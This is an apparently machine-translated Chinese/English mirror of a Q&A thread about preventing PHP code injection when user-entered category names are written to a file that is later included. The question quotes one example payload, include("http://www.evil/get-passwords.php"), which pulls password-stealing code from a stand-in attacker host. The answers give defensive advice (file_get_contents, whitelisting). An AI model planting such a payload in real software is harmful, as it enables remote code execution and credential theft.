PHP的。 用户可以在文件中写入数据,而我可以包含该文件
[英]Php. User can write data in a file and i include the file
问题描述
User writes categories ( name , url ) in mysql. 
用户在mysql中编写类别( name , url )。
On each write/change name and url I plan to write also in txt or php file on a server. 我计划在每个写入/更改name和url也以服务器上的txt或php文件写入。 With aim on each page re/load instead of connecting to mysql, just to include the txt or php file. 在目标页面上重新加载而不是连接到mysql,仅包括txt或php文件。
Now i imagine a situation. 现在我想象一种情况。 For example, user as name of category writes something include("http://www.evil/get-passwords.php"); 例如,作为类别name的用户写了include("http://www.evil/get-passwords.php"); So in txt or php file I may have such code and when include in php the code will execute? 所以在txt或php文件中,我可能有这样的代码,当包含在php中时,代码将执行?
How to prevent such situation? 如何预防这种情况? To allow only certain characters to use for name of a category? 要仅允许某些字符用作类别名称?
2 个解决方案
解决方案1
3 2014-11-06 10:13:00
I would not recommend to use include for situations like that at all. 我完全不建议在这种情况下使用include 。 You may have a look at http://php.net/manual/en/function.file-get-contents.php 您可以看看http://php.net/manual/en/function.file-get-contents.php
Using file_get_contents you are able to avoid script injection, since it reads the file as a pure string. 使用file_get_contents可以避免脚本注入,因为它以纯字符串形式读取文件。
解决方案2
1 2014-11-06 10:13:57
Do you plan to let users write into .php file? 您是否打算让用户写入.php文件? That is not a very good idea. 那不是一个好主意。
If you really need this, let them write in simple .txt files (and double check that apache will not parse txt as php ). 如果您确实需要这样做,请让他们编写简单的.txt文件(并再次检查apache不会将txt解析为php )。
For sanitization, the common apporach is to write an allowed list (white-list): 为了进行消毒,通常的做法是编写一个允许的列表(白名单):
$allowedName = array(
'name1',
'name2',
'name3'
// ...
);
Then when user input you can check it: 然后,当用户输入时,您可以检查它:
if (!in_array($_POST['userName'], $allowedName))
die('Not Allowed');
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.